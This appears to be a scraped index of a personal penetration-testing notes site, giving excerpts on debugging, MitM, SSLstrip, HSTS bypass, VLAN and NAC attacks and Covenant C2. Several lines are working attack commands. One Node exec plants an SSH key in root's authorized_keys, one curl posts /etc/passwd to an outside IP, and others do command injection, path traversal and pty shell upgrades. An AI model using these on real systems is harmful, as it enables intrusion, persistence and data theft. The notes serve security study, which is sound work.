https://gtfobins.github.io/gtfobins/snap/
General purpose debugger. Hint: gbd disables ASRL by default. Commands General set disassembly-flavor intel/att Process handling run runs a programm without parameters run `python -c 'print("a")'‘ runs a program with a parameter run < <(python -c 'print("a")') runs a program and enters the given string into STDIN c continue si step one instruction Breakpoints break $f…
See also the Buffer Overflow post Execute shellcode Scenario: You have shellcode. You want to run it to analyze it in a debugger. On Windows Add the shellcode after the breakpoint with i686-w64-mingw32-cc s.c -o s.exex86_64-w64-mingw32-cc s.c -o s.exe and run it in a debugger. On Linux Add the shellcode after the breakpoint with gcc [-m32] s.c…
Bugs can only be found durring fuzzing code, which is executed. But which parts of the code of a target system is executing during a fuzzing session? And how we can improve our fuzzer to include also tests for code blocks which weren’t covered before? Dynamorio We’ll use now Dynamorio — a runtime code manipulation…
Scapy fundamentals Commands for the interactive scapy interpreter: conf.iface shows the currently used interface conf.iface='tun0' sets the interface to use ls shows all protocols ls(TCP) shows all known headers for a given protocol lsc shows build-in functions Details about a packet p: p shows general information p.summary() shows also general information p.show() shows each field and…
PE Portable Executung or DLL Dynamic Linking Libraries can be edited to remove or add capabilities or own code. Read and modify a PE file The following Python3 script reads a file, prints out a header, modified it to remove ASLR and write a new file without this flag. f = pefile.PE('filename.exe') print(hex(f.OPTIONAL_HEADER.DllCharacteristics)) // print as hex to…
This page contains various unstructured notes about crypto related things. General notes If you find somewhere that something should be random, but it isn’t, this is already an important finding. Stream Ciphers A stream cipher encrypts a cleartext bit for bit or character for character (normally via XOR) with a secret key. It produces a…
mitmdump is a proxy which can store and modify content. Change content of a third-party site Scenario: You want to manipulate some content from a website $target visits. Perform ARP-poisening with Bettercap, Ettercap, the http_hijack.py script or somehow else. Start mitmdump in transparent mode:mitmdump --mode transparent --replace /~s/wars/trek/or alternatively to read the new content from a…
Bypass HSTS is based on hostnames. If a target already visited www.supersite.example, you can try to redirect the target to a similar domain which the browser never visited before and thus doesn’t has HSTS activated. Rewrite the Host HTTP header for your server you want to impersonate and add another character, e.g. wwww.supersite.example. You prepared…
SSLstrip works as proxy which replaces HTTPS references in HTTP, HTML, JS,.… responses with HTTP versions. Installation: SSLstrip is old. Create a venv and install an older version of twisted: venv/bin/pip install Twisted==18.9.0 Remove HTTPS references via MitM Scenario: You want that $target routes all HTTP traffic through your own system. Your system should remove each…
Socat If Socat is not on the target system, upload a static binary. This will listen to port 5555 and forward it to the given IP on the given port deeper in the target’s network: socat -ddd TCP-LISTEN:5555,reuseaddr,fork TCP:10.4.247.215:5432 Proxychains ! If proxychains is slow, especially while port scanning, try to reduce the following parameters:…
This is an overview blog post. MitM Ettercap Bettercap L2 Scapy L2 mitmdump L3 Loki Various VLAN attacks NAC Network admission control Other tools and notes: Use http_hijack.py in the P151 script directory) to quickly set up a MitM. Check if you can See OSPF packets. Inspect then in Wireshark for the Auth Type field. If this is…
Network packet manipulation shell and library for Python. (Github)
A Ettercap successor, written in Go. Basic commands: Passive ARP probing: net.recon on net.recon off Active probing: net.probe on net.probe off Sniffing: set net.sniff.output /tmp/sniff.pcap // optional net.sniff on net.sniff off Spoofing: set arp.spoof.targets $target1, $target2, $target3 arp.spoof on arp.spoof off DNS Spoofing: set dns.spoof.domains target.domain // the domain which should be resolved as… set…
Definitions: A trunk connection is a connection between two switches. Tools Yersinia is a layer 2 modification framework. VoIPHopper is a simple tool which can sniff VoIP traffic and output the VLAN ID from the VoIP network:voiphopper -c 0 -i eth0 Enumerate existing VLANs Start Yersiniayersinia -I Press g Select DTP Press 5 to see…
Caution: Don’t change the MAC address via a remote session because of reasons… Linux ifconfig eth0 ether 00:01:02:03:04:05 Mac ifconfig en0 ether 00:01:02:03:04:05 Windows macshift e.g.
Techniques which decides if a new device can join the normal or a special network. A captive portal forces a client to an authentication page. After authentication in a normal low-security environment (where you cannot assume preconfigured systems) the authentication is usually granted to a combination of MAC and IP. Therefore, try to sniff valid…
-NET attack framework: https://github.com/cobbr/Covenant Usage Create a listener on the attack system. Add a launcher to the listener. The attack system now provides a payload file the victim has to start. You can use UrbanBishop to inject the payload into a running process. As soon as the payload is executed, Covenant will show on the dashboard…
Execute command: const { exec } = require("child_process"); exec(“echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHGb9AwdEdyFm6SBuQeCWyKMh+CRXlMMb4l1GKlB8rnWoIzVClRfeWZnYzkBG487Mhb3svrd/ouVpXKWsFiAFSl5OJie88WJGTWc+3sU3I/TvuTbDgrqWwUMpPZj0jYgq99iaQeJDNPjKTs3w0QEq7GT1q69DU3m1jDCggdHYzMMA8byVXpCUivN1o4tkABhqSeUeZgW2Q9n2NxKkHGNvbkAoutFho1g8azgvnHI9HOExd81ppdzuAVC/YOTRtUKIB3ZNnfYS1qE7xp4fn7a/BEA+N8Axl0aaXLVLi2/RI+nwotdDb/vDXotS2X6B781xE9JboCRvJzejACszlMcI3bPq+R6UY3XILHDl3jpY70IFrpmX/aeUZ4d8m6A79EwyaQuckyU5eTVx7BH/RwH7hmtd7DR6VcxqNzteI49Yq8HwpyBU62I2AmnMuEXEvcPQLiM4947I3pxyZkYtZ5kULcXuWTMOITvPrFNuzwwPW1x3NbR+EnSbLtk8Ybr5iDyM= root@imac2019-kali’ > /root/.ssh/authorized_keys”, (error, stdout, stderr) => { if (error) { console.log(‘error: ${error.message}‘); return; } if (stderr) { console.log(‘stderr: ${stderr}‘); return; } console.log(‘stdout: ${stdout}‘);});
Write into a file: curl $url -o /tmp/f.txtcurl $url --output /tmp/f.txtcurl $url > /tmp/f.txt Post a local file: curl -X POST --data-binary @/etc/passwd http://192.168.49.53:21/ Execute command and return the result: curl -d q=`id` http://localhost:21/ With a header curl --header "Host: localhost" 10.10.10.10 Use the correct path also with ../ (usefull for file traversion attacks): curl --path-as-is $target:$port/public/../../../etc/passwd
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';